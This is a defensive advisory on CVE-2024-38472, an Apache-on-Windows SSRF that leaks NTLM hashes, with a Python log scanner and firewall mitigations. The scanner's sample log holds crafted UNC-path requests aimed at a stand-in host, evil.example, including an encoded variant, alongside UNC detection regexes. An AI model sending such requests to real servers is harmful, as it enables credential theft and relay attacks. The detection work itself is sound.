CVE-2024-38472 Overview
CVE-2024-38472 is a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server running on Windows systems that enables attackers to potentially leak NTLM hashes to a malicious server. This vulnerability can be exploited through crafted malicious requests or content, allowing unauthorized access to sensitive Windows authentication credentials.
Critical Impact
This SSRF vulnerability on Windows-based Apache HTTP Server installations can lead to NTLM hash leakage, potentially enabling attackers to perform relay attacks or offline password cracking against captured credentials.
Affected Products
- Apache HTTP Server (versions prior to 2.4.60)
- NetApp ONTAP 9
Discovery Timeline
- 2024-07-01 - CVE-2024-38472 published to NVD
- 2025-07-01 - Last updated in NVD database
Technical Details for CVE-2024-38472
Vulnerability Analysis
This Server-Side Request Forgery (SSRF) vulnerability (CWE-918) affects Apache HTTP Server deployments on Windows operating systems. The vulnerability allows an attacker to force the server to make requests to arbitrary destinations, including UNC paths that trigger NTLM authentication. When the server processes malicious requests or content, it can be coerced into connecting to attacker-controlled SMB servers, inadvertently transmitting NTLM hashes.
The attack is particularly dangerous in Windows environments where NTLM authentication is commonly used. An attacker can leverage this vulnerability without requiring any authentication or user interaction, making it highly exploitable in network-accessible Apache deployments. The confidentiality impact is significant as captured NTLM hashes can be used for pass-the-hash attacks, relay attacks, or offline cracking to recover plaintext credentials.
Root Cause
The root cause of CVE-2024-38472 lies in improper validation and handling of URLs and paths within the Apache HTTP Server on Windows. The server fails to adequately restrict requests to UNC paths (e.g., \\attacker-server\share), and opening such a path triggers automatic NTLM authentication by the Windows operating system. This flaw allows specially crafted requests to force outbound connections that carry sensitive authentication material.
Attack Vector
The vulnerability is exploited via network-based attacks where an attacker can send malicious requests or content to the vulnerable Apache HTTP Server. The attack flow typically involves:
- The attacker identifies a Windows-based Apache HTTP Server that processes user-controllable URLs or content
- The attacker crafts a request containing a UNC path pointing to their malicious SMB server
- When the Apache server processes this request, Windows automatically attempts NTLM authentication with the attacker's server
- The attacker captures the NTLM hash, which can then be used for credential relay attacks or offline password cracking
This vulnerability allows remote exploitation without authentication. The attack does not require user interaction, making it particularly dangerous for internet-facing Apache installations on Windows.
Detection Methods for CVE-2024-38472
Indicators of Compromise
- Outbound SMB (port 445) or NetBIOS (port 139) connections from the Apache HTTP Server to unexpected external IP addresses
- Unusual UNC path references in Apache access logs or request parameters
- Network traffic showing NTLM authentication attempts to non-domain or external systems
- Apache server making unexpected outbound connections during request processing
Detection Strategies
- Monitor network traffic for outbound SMB connections originating from web server hosts
- Implement web application firewall (WAF) rules to detect and block UNC path patterns in requests
- Analyze Apache access logs for suspicious URL patterns containing backslashes or UNC-style paths
- Deploy intrusion detection signatures for SSRF attack patterns targeting Windows authentication
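As an added example (not code from this page or from the Apache project), the following Python scanner implements the access-log strategy above: it percent-decodes each request URL a bounded number of times (so double-encoded %255C is still seen as a backslash), then flags UNC-style \\host\share references separately from stray backslashes. The log lines are constructed samples in Apache combined format.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jul/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jul/2024:10:00:02 +0000] "GET /app?file=\\203.0.113.10\share\x HTTP/1.1" 200 88 "-" "curl/8.0"
10.0.0.8 - - [01/Jul/2024:10:00:03 +0000] "GET /app?file=%5C%5C203.0.113.10%5Cshare HTTP/1.1" 200 88 "-" "curl/8.0"
10.0.0.9 - - [01/Jul/2024:10:00:04 +0000] "GET /app?file=%255C%255Cevil.example%255Cs HTTP/1.1" 200 88 "-" "curl/8.0"
10.0.0.6 - - [01/Jul/2024:10:00:05 +0000] "GET /docs/a%5Cb.txt HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [time], "method url proto", status, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# \\host\ is a UNC prefix naming a remote host, which is what Windows would authenticate to.
UNC_RE = re.compile(r"\\\\(?P<host>[A-Za-z0-9._-]+)\\")

def normalize(url: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded %255C is seen as a backslash."""
    for _ in range(rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url

def classify(url: str):
    """Return ('unc', host) for a UNC-style path, ('backslash', None) for any stray backslash, else None."""
    norm = normalize(url)
    m = UNC_RE.search(norm)
    if m:
        return ("unc", m.group("host"))
    if "\\" in norm:
        return ("backslash", None)
    return None

def scan_log(text: str) -> list:
    """Parse each access-log line and collect requests worth alerting on."""
    findings = []
    for line in text.strip().splitlines():
        rec = LOG_RE.match(line)
        if not rec:
            continue  # skip lines that are not in combined format
        verdict = classify(rec.group("url"))
        if verdict:
            findings.append({"client": rec.group("ip"), "url": rec.group("url"),
                             "kind": verdict[0], "unc_host": verdict[1]})
    return findings
```

Running scan_log over a real access log yields one finding per suspicious request; the "unc" findings name the host the server would have tried to authenticate to, which is the value to correlate with outbound SMB connections.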
Monitoring Recommendations
- Enable detailed logging on Apache HTTP Server to capture full request URLs and parameters
- Configure network monitoring to alert on any outbound SMB traffic from web server segments
- Implement SIEM rules to correlate Apache requests with subsequent outbound authentication attempts
- Monitor for failed or unusual NTLM authentication events in Windows Security logs
How to Mitigate CVE-2024-38472
Immediate Actions Required
- Upgrade Apache HTTP Server to version 2.4.60 or later immediately
- Review and update existing configurations that access UNC paths to use the new UNCList directive
- Block outbound SMB traffic (ports 445, 139) from web servers at the network perimeter
- Implement network segmentation to restrict web server access to internal resources
Patch Information
Apache has released version 2.4.60 which addresses this SSRF vulnerability. Users should upgrade to this version or later to remediate CVE-2024-38472. It is important to note that existing configurations that access UNC paths will require configuration updates to use the new UNCList directive to allow legitimate access during request processing. For detailed patch information, refer to the Apache HTTP Server Vulnerabilities page. Additional vendor-specific guidance is available in the NetApp Security Advisory NTAP-20240712-0001.
Workarounds
- Configure firewall rules to block all outbound SMB/NetBIOS traffic from Apache server hosts
- Implement input validation to reject requests containing UNC path patterns or backslash characters
- Deploy a reverse proxy or WAF in front of Apache to filter potentially malicious requests
- Restrict Apache's network access using Windows Firewall or host-based security tools
# Configuration example - block outbound SMB/NetBIOS at Windows Firewall.
# Outbound rules must match the remote (destination) port on the far-end server,
# so use remoteport rather than localport.
netsh advfirewall firewall add rule name="Block Outbound SMB" dir=out action=block protocol=tcp remoteport=445
netsh advfirewall firewall add rule name="Block Outbound NetBIOS" dir=out action=block protocol=tcp remoteport=139
# After upgrading to Apache 2.4.60+, configure UNCList for legitimate UNC access.
# In httpd.conf (UNCList lists the hostnames permitted in UNC paths, not full share paths):
# UNCList allowed-server
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.